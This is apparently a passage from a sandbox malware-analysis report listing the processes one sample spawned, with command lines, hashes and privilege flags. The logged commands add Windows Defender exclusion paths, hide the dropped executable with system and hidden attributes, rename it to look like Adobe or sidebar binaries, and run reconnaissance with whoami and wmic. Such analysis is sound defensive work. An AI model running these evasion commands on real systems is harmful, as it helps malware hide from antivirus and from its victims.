Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:35
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:35
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:35
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:36
Start date:14/01/2022
Path:C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):false
Commandline:ipconfig //flushdns
Imagebase:0x7ff652f30000
File size:34304 bytes
MD5 hash:C7FAFF418EF7AD7ABDA10A5BCF9B53EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:36
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic cpu get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:36
Start date:14/01/2022
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:reg add "HKCU\Software\Mystic Entertainment" /f
Imagebase:0x7ff7f2ad0000
File size:72704 bytes
MD5 hash:E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:36
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:37
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic cpu get name
Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:37
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "attrib +S +H C:\Windows\acrotray.exe"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:37
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:38
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:38
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:39
Start date:14/01/2022
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +S +H C:\Windows\acrotray.exe
Imagebase:0x7ff7e1670000
File size:21504 bytes
MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:39
Start date:14/01/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Imagebase:0x7ff777fc0000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET

General

Start time:19:11:40
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic path win32_VideoController get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:40
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:41
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:43
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C ver
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:43
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:46
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic path win32_VideoController get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:46
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:47
Start date:14/01/2022
Path:C:\Windows\acrotray.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\acrotray.exe"
Imagebase:0x400000
File size:1843200 bytes
MD5 hash:8FB77EDBAE0C40E1E19D82A406B7615A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:48
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:49
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:50
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:50
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:50
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:50
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:50
Start date:14/01/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Imagebase:0x7ff777fc0000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:false
Has administrator privileges:false
Programmed in:.Net C# or VB.NET

General

Start time:19:11:51
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:51
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:51
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:51
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:52
Start date:14/01/2022
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:reg add "HKCU\Software\Trion Softworks" /f
Imagebase:0x7ff7f2ad0000
File size:72704 bytes
MD5 hash:E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:53
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:53
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:53
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:53
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:53
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:54
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:54
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:54
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic cpu get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:54
Start date:14/01/2022
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Imagebase:0x7ff7e1670000
File size:21504 bytes
MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:54
Start date:14/01/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Imagebase:0x7ff777fc0000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:false
Has administrator privileges:false
Programmed in:.Net C# or VB.NET

General

Start time:19:11:54
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:55
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic cpu get name
Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:56
Start date:14/01/2022
Path:C:\Windows\acrotray.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\acrotray.exe"
Imagebase:0x400000
File size:1843200 bytes
MD5 hash:8FB77EDBAE0C40E1E19D82A406B7615A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:58
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:58
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:58
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:58
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:59
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic path win32_VideoController get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:59
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:59
Start date:14/01/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Imagebase:0x7ff777fc0000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:false
Has administrator privileges:false
Programmed in:.Net C# or VB.NET

General

Start time:19:11:59
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:59
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:11:59
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:00
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:00
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:00
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:00
Start date:14/01/2022
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:reg add "HKCU\Software\Mystic Entertainment" /f
Imagebase:0x7ff7f2ad0000
File size:72704 bytes
MD5 hash:E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:01
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:02
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:02
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70d6e0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:02
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:02
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:02
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:02
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:03
Start date:14/01/2022
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Imagebase:0x7ff7e1670000
File size:21504 bytes
MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:03
Start date:14/01/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Imagebase:0x7ff777fc0000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:false
Has administrator privileges:false
Programmed in:.Net C# or VB.NET

General

Start time:19:12:05
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C ver
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:06
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic cpu get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:06
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:07
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:07
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic path win32_VideoController get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:07
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic cpu get name
Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:07
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:08
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff6746d0000
File size:521728 bytes
MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:10
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "wmic path win32_VideoController get name"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:10
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

General

Start time:19:12:11
Start date:14/01/2022
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
